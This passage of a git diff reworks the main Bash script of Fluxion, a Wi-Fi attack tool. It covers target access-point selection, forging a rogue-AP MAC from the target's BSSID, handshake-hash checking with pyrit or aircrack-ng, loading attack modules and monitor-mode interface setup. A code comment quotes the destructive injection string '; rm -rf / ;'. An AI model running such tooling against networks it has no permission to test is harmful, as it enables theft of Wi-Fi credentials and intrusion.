\ + candidatesMAC[@] + + echo + + FluxionTargetMAC=${IOQueryFormatFields[7]} + FluxionTargetSSID=${IOQueryFormatFields[1]} + FluxionTargetChannel=${IOQueryFormatFields[5]} + + FluxionTargetEncryption=${IOQueryFormatFields[6]} + + FluxionTargetMakerID=${FluxionTargetMAC:0:8} + FluxionTargetMaker=$( + macchanger -l | + grep ${FluxionTargetMakerID,,} 2> $FLUXIONOutputDevice | + cut -d ' ' -f 5- + ) + + # Sanitize network ESSID to make it safe for manipulation. + # Notice: Why remove these? Some smartass might decide to name their + # network "; rm -rf / ;". If the string isn't sanitized accidentally + # shit'll hit the fan and we'll have an extremly distressed user. + # Replacing ' ', '/', '.', '~', '\' with '_' + FluxionTargetSSIDClean=$( + echo "$FluxionTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' + ) + + # We'll change a single hex digit from the target AP's MAC address. + # This new MAC address will be used as the rogue AP's MAC address. + local -r rogueMACHex=$(printf %02X $((0x${FluxionTargetMAC:13:1} + 1))) + FluxionTargetRogueMAC="${FluxionTargetMAC::13}${rogueMACHex:1:1}${FluxionTargetMAC:14:4}" +} + +fluxion_target_show() { + format_apply_autosize "%*s$CBlu%7s$CClr: %-32s%*s\n" + + local colorlessFormat="$FormatApplyAutosize" + local colorfullFormat=$( + echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g' + ) + + printf "$colorlessFormat" "" "ESSID" "\"${FluxionTargetSSID:-[N/A]}\" / ${FluxionTargetEncryption:-[N/A]}" "" + printf "$colorlessFormat" "" "Channel" " ${FluxionTargetChannel:-[N/A]}" "" + printf "$colorfullFormat" "" "BSSID" " ${FluxionTargetMAC:-[N/A]} ($CYel${FluxionTargetMaker:-[N/A]}$CClr)" "" + + echo +} + +fluxion_target_unset_tracker() { + if [ ! "$FluxionTargetTrackerInterface" ]; then return 1; fi + + FluxionTargetTrackerInterface="" +} + +fluxion_target_set_tracker() { + if [ "$FluxionTargetTrackerInterface" ]; then return 0; fi + + # Check if attack provides tracking interfaces, get & set one. + if ! type -t attack_tracking_interfaces &> /dev/null; then + return 1 + fi + + if [ "$FluxionTargetTrackerInterface" == "" -a ! "$FLUXIONAuto" ]; then + echo "Running get interface (tracker)." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_tracking_interfaces \ + "$FLUXIONTargetTrackerInterfaceQuery"; then + echo "Failed to get tracker interface!" > $FLUXIONOutputDevice + return 2 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$FluxionTargetTrackerInterface + fi + + # If user skipped a tracker interface, move on. + if [ ! "$selectedInterface" ]; then + fluxion_target_unset_tracker + return 0 + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate tracking interface!" > $FLUXIONOutputDevice + return 3 + fi + + echo "Successfully got tracker interface." > $FLUXIONOutputDevice + FluxionTargetTrackerInterface=${FluxionInterfaces[$selectedInterface]} +} + +fluxion_target_unset() { + FluxionTargetMAC="" + FluxionTargetSSID="" + FluxionTargetChannel="" + + FluxionTargetEncryption="" + + FluxionTargetMakerID="" + FluxionTargetMaker="" + + FluxionTargetSSIDClean="" + + FluxionTargetRogueMAC="" + + return 1 # To trigger undo-chain. +} + +fluxion_target_set() { + # Check if attack is targetted & set the attack target if so. + if ! type -t attack_targetting_interfaces &> /dev/null; then + return 1 + fi + + if [ \ + "$FluxionTargetSSID" -a \ + "$FluxionTargetMAC" -a \ + "$FluxionTargetChannel" \ + ]; then + # If we've got a candidate target, ask user if we'll keep targetting it. + + fluxion_header + fluxion_target_show + echo + echo -e "$FLUXIONVLine $FLUXIONTargettingAccessPointAboveNotice" + + # TODO: This doesn't translate choices to the selected language. + while ! echo "$choice" | grep -q "^[ynYN]$" &> /dev/null; do + echo -ne "$FLUXIONVLine $FLUXIONContinueWithTargetQuery [Y/n] " + local choice + read choice + if [ ! "$choice" ]; then break; fi + done + + echo -ne "\n\n" + + if [ "${choice,,}" != "n" ]; then + return 0 + fi + elif [ \ + "$FluxionTargetSSID" -o \ + "$FluxionTargetMAC" -o \ + "$FluxionTargetChannel" \ + ]; then + # TODO: Survey environment here to autofill missing fields. + # In other words, if a user gives incomplete information, scan + # the environment based on either the ESSID or BSSID, & autofill. + echo -e "$FLUXIONVLine $FLUXIONIncompleteTargettingInfoNotice" + sleep 3 + fi + + if ! fluxion_get_interface attack_targetting_interfaces; then + return 2 + fi + + if ! fluxion_allocate_interface $FluxionInterfaceSelected; then + return 3 + fi + + if ! fluxion_get_target \ + ${FluxionInterfaces[$FluxionInterfaceSelected]}; then + return 4 + fi +} + + +# =================== < Hash Subroutines > =================== # +# Parameters: [channel [encryption [maker]]] +fluxion_hash_verify() { + if [ ${#@} -lt 3 ]; then return 1; fi + + local -r hashPath=$1 + local -r hashBSSID=$2 + local -r hashESSID=$3 + local -r hashChannel=$4 + local -r hashEncryption=$5 + local -r hashMaker=$6 + + if [ ! -f "$hashPath" -o ! -s "$hashPath" ]; then + echo -e "$FLUXIONVLine $FLUXIONHashFileDoesNotExistError" + sleep 3 + return 2 + fi + + if [ "$FLUXIONAuto" ]; then + local -r verifier="pyrit" + else + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery" + echo + + fluxion_target_show + + local choices=( \ + "$FLUXIONHashVerificationMethodPyritOption" \ + "$FLUXIONHashVerificationMethodAircrackOption" \ + "$FLUXIONGeneralBackOption" \ + ) + + io_query_choice "" choices[@] + + echo + + case "$IOQueryChoice" in + "$FLUXIONHashVerificationMethodPyritOption") + local -r verifier="pyrit" ;; + + "$FLUXIONHashVerificationMethodAircrackOption") + local -r verifier="aircrack-ng" ;; + + "$FLUXIONGeneralBackOption") + return -1 ;; + esac + fi + + hash_check_handshake \ + "$verifier" \ + "$hashPath" \ + "$hashESSID" \ + "$hashBSSID" + + local -r hashResult=$? + + # A value other than 0 means there's an issue with the hash. + if [ $hashResult -ne 0 ]; then + echo -e "$FLUXIONVLine $FLUXIONHashInvalidError" + else + echo -e "$FLUXIONVLine $FLUXIONHashValidNotice" + fi + + sleep 3 + + if [ $hashResult -ne 0 ]; then return 1; fi +} + +fluxion_hash_unset_path() { + if [ ! "$FluxionHashPath" ]; then return 1; fi + FluxionHashPath="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi +} + +# Parameters: [channel [encryption [maker]]] +fluxion_hash_set_path() { + if [ "$FluxionHashPath" ]; then return 0; fi + + fluxion_hash_unset_path + + local -r hashPath=$1 + + # If we've got a default path, check if a hash exists. + # If one exists, ask users if they'd like to use it. + if [ "$hashPath" -a -f "$hashPath" -a -s "$hashPath" ]; then + if [ "$FLUXIONAuto" ]; then + FluxionHashPath=$hashPath + return + else + local choices=( \ + "$FLUXIONUseFoundHashOption" \ + "$FLUXIONSpecifyHashPathOption" \ + "$FLUXIONHashSourceRescanOption" \ + "$FLUXIONGeneralBackOption" \ + ) + + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice" + echo -e "$FLUXIONVLine $FLUXIONUseFoundHashQuery" + echo + + io_query_choice "" choices[@] + + echo + + case "$IOQueryChoice" in + "$FLUXIONUseFoundHashOption") + FluxionHashPath=$hashPath + return ;; + + "$FLUXIONHashSourceRescanOption") + fluxion_hash_set_path "$@" + return $? ;; + + "$FLUXIONGeneralBackOption") + return -1 ;; + esac + fi + fi + + while [ ! "$FluxionHashPath" ]; do + fluxion_header + + echo + echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileQuery" + echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileReturnTip" + echo + echo -ne "$FLUXIONAbsolutePathInfo: " + read FluxionHashPath + + # Back-track when the user leaves the hash path blank. + # Notice: Path is cleared if we return, no need to unset. + if [ ! "$FluxionHashPath" ]; then return -1; fi + + # Make sure the path points to a valid generic file. + if [ ! -f "$FluxionHashPath" -o ! -s "$FluxionHashPath" ]; then + echo -e "$FLUXIONVLine $FLUXIONEmptyOrNonExistentHashError" + sleep 5 + fluxion_hash_unset_path + fi + done +} + +# Paramters: +fluxion_hash_get_path() { + # Assure we've got the bssid and the essid passed in. + if [ ${#@} -lt 2 ]; then return 1; fi + + while true; do + fluxion_hash_unset_path + if ! fluxion_hash_set_path "$@"; then return $?; fi + + if fluxion_hash_verify "$FluxionHashPath" "$2" "$3"; then + break; + fi + done + + # At this point FluxionHashPath will be set and ready. +} + + +# ================== < Attack Subroutines > ================== # +fluxion_unset_attack() { + local -r attackWasSet=${FluxionAttack:+1} + FluxionAttack="" + if [ ! "$attackWasSet" ]; then return 1; fi +} + +fluxion_set_attack() { + if [ "$FluxionAttack" ]; then return 0; fi + + fluxion_unset_attack + + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONAttackQuery" + echo + + fluxion_target_show + + local attacks + readarray -t attacks < <(ls -1 attacks) + + local descriptions + readarray -t descriptions < <( + head -n 3 attacks/*/language/$FluxionLanguage.sh | \ + grep -E "^# description: " | sed -E 's/# \w+: //' + ) + + local identifiers=() + + local attack + for attack in "${attacks[@]}"; do + local identifier=$( + head -n 3 "attacks/$attack/language/$FluxionLanguage.sh" | \ + grep -E "^# identifier: " | sed -E 's/# \w+: //' + ) + if [ "$identifier" ]; then identifiers+=("$identifier") + else identifiers+=("$attack") + fi + done + + attacks+=("$FLUXIONGeneralBackOption") + identifiers+=("$FLUXIONGeneralBackOption") + descriptions+=("") + + io_query_format_fields "" \ + "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" \ + attacks[@] identifiers[@] descriptions[@] + + echo + + if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralBackOption" ]; then + return -1 + fi + + if [ "${IOQueryFormatFields[1]}" = "$FluxionRestartOption" ]; then + return 2 + fi + + + FluxionAttack=${IOQueryFormatFields[0]} +} + +fluxion_unprep_attack() { + if type -t unprep_attack &> /dev/null; then + unprep_attack + fi + + IOUtilsHeader="fluxion_header" + + return 1 # Trigger another undo since prep isn't significant. +} + +fluxion_prep_attack() { + local -r path="$FLUXIONPath/attacks/$FluxionAttack" + + if [ ! -x "$path/attack.sh" ]; then return 1; fi + if [ ! -x "$path/language/$FluxionLanguage.sh" ]; then return 2; fi + + # Load attack parameters if any exist. + if [ "$AttackCLIArguments" ]; then + eval set -- "$AttackCLIArguments" + # Remove them after loading them once. + unset AttackCLIArguments + fi + + # Load attack and its corresponding language file. + # Load english by default to overwrite globals that ARE defined. + source "$path/language/en.sh" + if [ "$FluxionLanguage" != "en" ]; then + source "$path/language/$FluxionLanguage.sh" + fi + source "$path/attack.sh" + + # Check if attack is targetted & set the attack target if so. + if type -t attack_targetting_interfaces &> /dev/null; then + if ! fluxion_target_set; then return 3; fi + fi + + # Check if attack provides tracking interfaces, get & set one. + if type -t attack_tracking_interfaces &> /dev/null; then + if ! fluxion_target_set_tracker; then return 4; fi + # TODO: Remove this below after we've implemented tracking. + # I suggest we use airodump-ng, periodically checking by BSSID. + if [ "$FluxionTargetTrackerInterface" ]; then + fluxion_header + echo -e "$FLUXIONVLine Hold the hell up... that hasn't been implemented yet." + sleep 4 + echo -e "$FLUXIONVLine We'll pretend you selected \"$FLUXIONGeneralSkipOption\"$CClr." + sleep 4 + FluxionTargetTrackerInterface="" + fi + fi + + if ! prep_attack; then return 5; fi +} + +fluxion_run_attack() { + start_attack + + local choices=( \ + "$FLUXIONSelectAnotherAttackOption" \ + "$FLUXIONGeneralExitOption" \ + ) + + io_query_choice \ + "$(io_dynamic_output $FLUXIONAttackInProgressNotice)" choices[@] + + echo + + # IOQueryChoice is a global, meaning, its value is volatile. + # We need to make sure to save the choice before it changes. + local choice="$IOQueryChoice" + + stop_attack + + if [ "$choice" = "$FLUXIONGeneralExitOption" ]; then + fluxion_handle_exit + fi + + fluxion_unset_attack +} + + +# ============================================================ # +# ================= < Argument Executables > ================= # +# ============================================================ # +eval set -- "$FLUXIONCLIArguments" # Set environment parameters. +while [ "$1" != "" -a "$1" != "--" ]; do + case "$1" in + -t|--target) echo "Not yet implemented!"; sleep 3; fluxion_shutdown;; + esac + shift # Shift new parameters +done + + +# ============================================================ # +# ===================== < FLUXION Loop > ===================== # +# ============================================================ # +fluxion_main() { + fluxion_startup + + fluxion_set_resolution + + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + local sequence=( + "set_language" + "set_attack" + "prep_attack" + "run_attack" + ) + + while true; do # Fluxion's runtime-loop. + fluxion_do_sequence fluxion sequence[@] + done + + fluxion_shutdown +} + +fluxion_main # Start Fluxion + +# FLUXSCRIPT END diff --git a/fluxion.sh b/fluxion.sh deleted file mode 100755 index 0388588..0000000 --- a/fluxion.sh +++ /dev/null @@ -1,1025 +0,0 @@ -#!/bin/bash - -################################ < FLUXION Parameters > ################################ -# NOTE: The FLUXIONPath constant will not be populated correctly if the script is called -# directly via a symlink. Symlinks in the path to the script should work completely fine. -declare -r FLUXIONPath="$(cd "$(dirname "$0")" ;pwd -P -)" - -declare -r FLUXIONWorkspacePath="/tmp/fluxspace" -declare -r FLUXIONHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes" -declare -r FLUXIONScanDB="dump" - -declare -r FLUXIONNoiseFloor=-90 -declare -r FLUXIONNoiseCeiling=-60 - -declare -r FLUXIONVersion=3 -declare -r FLUXIONRevision=11 - -declare -r FLUXIONDebug=${FLUXIONDebug:+1} -declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} -declare -r FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} -declare -r FLUXIONAuto=${FLUXIONAuto:+1} - -# FLUXIONDebug [Normal Mode "" / Developer Mode 1] -declare -r FLUXIONOutputDevice=$([ $FLUXIONDebug ] && echo "/dev/stdout" || echo "/dev/null") - -declare -r FLUXIONHoldXterm=$([ $FLUXIONDebug ] && echo "-hold" || echo "") - -################################# < Library Includes > ################################# -source lib/installer/InstallerUtils.sh -source lib/InterfaceUtils.sh -source lib/SandboxUtils.sh -source lib/FormatUtils.sh -source lib/ColorUtils.sh -source lib/IOUtils.sh -source lib/HashUtils.sh - -################################ < FLUXION Parameters > ################################ -FLUXIONPrompt="$CRed[${CSBlu}fluxion$CSYel@$CSWht$HOSTNAME$CClr$CRed]-[$CSYel~$CClr$CRed]$CClr " -FLUXIONVLine="$CRed[$CSYel*$CClr$CRed]$CClr" - -################################ < Library Parameters > ################################ -InterfaceUtilsOutputDevice="$FLUXIONOutputDevice" - -SandboxWorkspacePath="$FLUXIONWorkspacePath" -SandboxOutputDevice="$FLUXIONOutputDevice" - -InstallerUtilsWorkspacePath="$FLUXIONWorkspacePath" -InstallerUtilsOutputDevice="$FLUXIONOutputDevice" -InstallerUtilsNoticeMark="$FLUXIONVLine" - -PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" - -IOUtilsHeader="fluxion_header" -IOUtilsQueryMark="$FLUXIONVLine" -IOUtilsPrompt="$FLUXIONPrompt" - -HashOutputDevice="$FLUXIONOutputDevice" - -################################# < Super User Check > ################################# -if [ $EUID -ne 0 ]; then - echo -e "${CRed}You don't have admin privilegies, execute the script as root.$CClr" - exit 1 -fi - -################################### < XTerm Checks > ################################### -if [ ! "${DISPLAY:-}" ]; then - echo -e "${CRed}The script should be executed inside a X (graphical) session.$CClr" - exit 2 -fi - -if ! hash xdpyinfo 2>/dev/null; then - echo -e "${CRed}xdpyinfo not installed, please install the relevant package for your distribution.$CClr" - exit 3 -fi - -if ! xdpyinfo &>/dev/null; then - echo -e "${CRed}The script failed to initialize an xterm test session.$CClr" - exit 3 -fi - -################################# < Default Language > ################################# -source language/en.sh - -################################# < User Preferences > ################################# -if [ -x "$FLUXIONPath/preferences.sh" ]; then source "$FLUXIONPath/preferences.sh"; fi - -######################################################################################## -function fluxion_exitmode() { - if [ $FLUXIONDebug ]; then return 1; fi - - fluxion_header - - echo -e "$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr" - - # List currently running processes which we might have to kill before exiting. - local processes - readarray processes < <(ps -A) - - # Currently, fluxion is only responsible for killing airodump-ng, because - # fluxion explicitly it uses it to scan for candidate target access points. - # NOTICE: Processes started by subscripts, such as an attack script, - # MUST BE TERMINATED BY THAT SAME SCRIPT in the subscript's abort handler. - local targets=("airodump-ng") - - local targetID # Program identifier/title - for targetID in "${targets[@]}"; do - # Get PIDs of all programs matching targetPID - local targetPID=$(echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}') - if [ ! "$targetPID" ]; then continue; fi - echo -e "$CWht[$CRed-$CWht] $(io_dynamic_output $FLUXIONKillingProcessNotice)" - killall $targetPID &>$FLUXIONOutputDevice - done - - # If the installer activated the package manager, make sure to undo any changes. - if [ "$PackageManagerCLT" ]; then - echo -e "$CWht[$CRed-$CWht] "$(io_dynamic_output "$FLUXIONRestoringPackageManagerNotice")"$CClr" - unprep_package_manager - fi - - if [ "$WIMonitor" ]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingMonitorNotice$CGrn $WIMonitor$CClr" - if [ "$FLUXIONAirmonNG" ]; then airmon-ng stop "$WIMonitor" &>$FLUXIONOutputDevice - else interface_set_mode "$WIMonitor" "managed" - fi - fi - - echo -e "$CWht[$CRed-$CWht] $FLUXIONRestoringTputNotice$CClr" - tput cnorm - - if [ ! $FLUXIONDebug ]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONDeletingFilesNotice$CClr" - sandbox_remove_workfile "$FLUXIONWorkspacePath/*" - fi - - if [ $FLUXIONWIKillProcesses ]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONRestartingNetworkManagerNotice$CClr" - - # systemctl check - systemd=$(whereis systemctl) - if [ "$systemd" = "" ]; then - service network-manager restart &>$FLUXIONOutputDevice & - service networkmanager restart &>$FLUXIONOutputDevice & - service networking restart &>$FLUXIONOutputDevice & - else - systemctl restart NetworkManager &>$FLUXIONOutputDevice & - fi - fi - - echo -e "$CWht[$CGrn+$CWht] $CGrn$FLUXIONCleanupSuccessNotice$CClr" - echo -e "$CWht[$CGrn+$CWht] $CGry$FLUXIONThanksSupportersNotice$CClr" - - sleep 3 - - clear - - exit 0 -} - -# Delete log only in Normal Mode ! -function fluxion_conditional_clear() { - # Clear iff we're not in debug mode - if [ ! $FLUXIONDebug ]; then clear; fi -} - -function fluxion_conditional_bail() { - echo ${1:-"Something went wrong, whoops! (report this)"} - sleep 5 - if [ ! $FLUXIONDebug ]; then - fluxion_handle_exit - return 1 - fi - echo "Press any key to continue execution..." - read bullshit -} - -# ERROR Report only in Developer Mode -function fluxion_error_report() { - echo "Error on line $1" -} - -if [ "$FLUXIONDebug" ]; then - trap 'fluxion_error_report $LINENUM' ERR -fi - -function fluxion_handle_abort_attack() { - if [ $(type -t stop_attack) ]; then - stop_attack &>$FLUXIONOutputDevice - unprep_attack &>$FLUXIONOutputDevice - else - echo "Attack undefined, can't stop anything..." >$FLUXIONOutputDevice - fi -} - -# In case an abort signal is received, -# abort any attacks currently running. -trap fluxion_handle_abort_attack SIGABRT - -function fluxion_handle_exit() { - fluxion_handle_abort_attack - fluxion_exitmode - exit 1 -} - -# In case of unexpected termination, run fluxion_exitmode -# to execute cleanup and reset commands. -trap fluxion_handle_exit SIGINT SIGHUP - -function fluxion_header() { - format_apply_autosize "[%*s]\n" - local verticalBorder=$FormatApplyAutosize - - format_apply_autosize "[%*s${CSRed}FLUXION $FLUXIONVersion${CSWht}.${CSBlu}$FLUXIONRevision$CSRed <$CIRed F${CIYel}luxion$CIRed I${CIYel}s$CIRed T${CIYel}he$CIRed F${CIYel}uture$CClr$CSYel >%*s$CSBlu]\n" - local headerTextFormat="$FormatApplyAutosize" - - fluxion_conditional_clear - - echo -e "$(printf "$CSRed$verticalBorder" "" | sed -r "s/ /~/g")" - printf "$CSRed$verticalBorder" "" - printf "$headerTextFormat" "" "" - printf "$CSBlu$verticalBorder" "" - echo -e "$(printf "$CSBlu$verticalBorder" "" | sed -r "s/ /~/g")$CClr" - echo - echo -} - -# Create working directory -if [ ! -d "$FLUXIONWorkspacePath" ]; then - mkdir -p "$FLUXIONWorkspacePath" &>$FLUXIONOutputDevice -fi - -####################################### < Start > ###################################### -if [ ! $FLUXIONDebug ]; then - FLUXIONBanner=() - - format_center_literals " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals "¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯" - FLUXIONBanner+=("$FormatCenterLiterals") - - clear - - if [ "$FLUXIONAuto" ]; then echo -e "$CBlu" - else echo -e "$CRed" - fi - - for line in "${FLUXIONBanner[@]}"; do - echo "$line" - sleep 0.05 - done - #echo "${FLUXIONBanner[@]}" - echo - - sleep 0.1 - format_center_literals "${CGrn}Site: ${CRed}https://github.com/FluxionNetwork/fluxion$CClr" - echo -e "$FormatCenterLiterals" - - sleep 0.1 - format_center_literals "${CSRed}FLUXION $FLUXIONVersion$CClr (rev. $CSBlu$FLUXIONRevision$CClr)$CYel by$CWht ghost" - echo -e "$FormatCenterLiterals" - - sleep 0.1 - if installer_utils_check_update "https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/fluxion.sh" "FLUXIONVersion=" "FLUXIONRevision=" $FLUXIONVersion $FLUXIONRevision; then installer_utils_run_update "https://github.com/FluxionNetwork/fluxion/archive/master.zip" "FLUXION-V$FLUXIONVersion.$FLUXIONRevision" "$(dirname "$FLUXIONPath")" - fi - - echo - - FLUXIONCLIToolsRequired=("aircrack-ng" "python2:python2.7|python2" "bc" "awk:awk|gawk|mawk" "curl" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" "fuser:psmisc" "killall:psmisc") - FLUXIONCLIToolsMissing=() - - while ! installer_utils_check_dependencies FLUXIONCLIToolsRequired[@]; do installer_utils_run_dependencies InstallerUtilsCheckDependencies[@] - done -fi - -#################################### < Resolution > #################################### -function fluxion_set_resolution() { # Windows + Resolution - # Calc options - RATIO=4 - - # Get demensions - SCREEN_SIZE=$(xdpyinfo | grep dimension | awk '{print $4}' | tr -d "(") - SCREEN_SIZE_X=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $1}')) - SCREEN_SIZE_Y=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $2}')) - - PROPOTION=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$SCREEN_SIZE_Y}")/1 | bc) - NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$RATIO}")/1 | bc) - NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$RATIO}")/1 | bc) - - NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$RATIO}")/1 | bc) - NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$RATIO}")/1 | bc) - - SCREEN_SIZE_MID_X=$(echo $(($SCREEN_SIZE_X + ($SCREEN_SIZE_X - 2 * $NEW_SCREEN_SIZE_X) / 2))) - SCREEN_SIZE_MID_Y=$(echo $(($SCREEN_SIZE_Y + ($SCREEN_SIZE_Y - 2 * $NEW_SCREEN_SIZE_Y) / 2))) - - # Upper - TOPLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0+0" - TOPRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+0" - TOP="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X+0" - - # Lower - BOTTOMLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-0" - BOTTOMRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0-0" - BOTTOM="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X-0" - - # Y mid - LEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-$SCREEN_SIZE_MID_Y" - RIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+$SCREEN_SIZE_MID_Y" - - # Big - TOPLEFTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y+0+0" - TOPRIGHTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y-0+0" -} - -##################################### < Language > ##################################### -function fluxion_set_language() { - if [ "$FLUXIONAuto" ]; then - FLUXIONLanguage="en" - else - # Get all languages available. - local languageCodes - readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') - - local languages - readarray -t languages < <(head -n 3 language/*.sh | grep -E "^# native: " | sed -E 's/# \w+: //') - - io_query_format_fields "$FLUXIONVLine Select your language" "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" languageCodes[@] languages[@] - - FLUXIONLanguage=${IOQueryFormatFields[0]} - - echo # Leave this spacer. - - # Check if all language files are present for the selected language. - find -type d -name language | while read language_dir; do - if [ ! -e "$language_dir/${FLUXIONLanguage}.sh" ]; then - echo -e "$FLUXIONVLine ${CYel}Warning${CClr}, missing language file:" - echo -e "\t$language_dir/${FLUXIONLanguage}.sh" - return 1 - fi - done - - # If a file is missing, fall back to english. - if [ $? -eq 1 ]; then - echo -e "\n\n$FLUXIONVLine Falling back to English..." - sleep 5 - FLUXIONLanguage="en" - return 1 - fi - - source "$FLUXIONPath/language/$FLUXIONLanguage.sh" - fi -} - -#################################### < Interfaces > #################################### -function fluxion_unset_interface() { - # Unblock interfaces to make them available. - echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" - rfkill unblock all &>$FLUXIONOutputDevice - - # Find all monitor-mode interfaces & all AP interfaces. - echo -e "$FLUXIONVLine $FLUXIONFindingExtraWINotice" - local wiMonitors=($(iwconfig 2>&1 | grep "Mode:Monitor" | awk '{print $1}')) - - # Remove all monitor-mode & all AP interfaces. - echo -e "$FLUXIONVLine $FLUXIONRemovingExtraWINotice" - if [ ${#wiMonitors[@]} -gt 0 ]; then - local monitor - for monitor in ${wiMonitors[@]}; do - # Remove any previously created fluxion AP interfaces. - #iw dev "FX${monitor:2}AP" del &> $FLUXIONOutputDevice - - # Remove monitoring interface after AP interface. - if [[ "$monitor" == *"mon" ]]; then airmon-ng stop "$monitor" >$FLUXIONOutputDevice - else interface_set_mode "$monitor" "managed" - fi - - if [ $FLUXIONDebug ]; then - echo -e "Stopped $monitor." - fi - done - fi - - WIMonitor="" -} - -# Choose Interface -function fluxion_set_interface() { - if [ "$WIMonitor" ]; then return 0; fi - - fluxion_unset_interface - - # Gather candidate interfaces. - echo -e "$FLUXIONVLine $FLUXIONFindingWINotice" - - # List of all available wireless network interfaces. - # These will be stored in our array right below. - interface_list_wireless - - local wiAlternate=("$FLUXIONGeneralRepeatOption") - local wiAlternateInfo=("") - local wiAlternateState=("") - local wiAlternateColor=("$CClr") - - interface_prompt "$FLUXIONVLine $FLUXIONInterfaceQuery" InterfaceListWireless[@] \ - wiAlternate[@] wiAlternateInfo[@] wiAlternateState[@] wiAlternateColor[@] - - local wiSelected=$InterfacePromptIfSelected - - if [ "$wiSelected" = "$FLUXIONGeneralRepeatOption" ]; then - fluxion_unset_interface - return 1 - fi - - if [ ! "$FLUXIONWIKillProcesses" -a "$InterfacePromptIfSelectedState" = "[-]" ]; then - echo -e "$FLUXIONVLine $FLUXIONSelectedBusyWIError" - echo -e "$FLUXIONVLine $FLUXIONSelectedBusyWITip" - sleep 7 - fluxion_unset_interface - return 1 - fi - - if ! fluxion_run_interface "$wiSelected"; then return 1 - fi - - WIMonitor="$FluxionRunInterface" -} - -function fluxion_run_interface() { - if [ ! "$1" ]; then return 1; fi - - local ifSelected="$1" - - if [ "$FLUXIONWIReloadDriver" ]; then - # Get selected interface's driver details/info-descriptor. - echo -e "$FLUXIONVLine $FLUXIONGatheringWIInfoNotice" - - if ! interface_driver "$ifSelected"; then - echo -e "$FLUXIONVLine$CRed $FLUXIONUnknownWIDriverError" - sleep 3 - return 1 - fi - - local ifDriver="$InterfaceDriver" - - # I'm not really sure about this conditional here. - # FLUXION 2 had the conditional so I kept it there. - if [ ! "$(echo $ifDriver | egrep 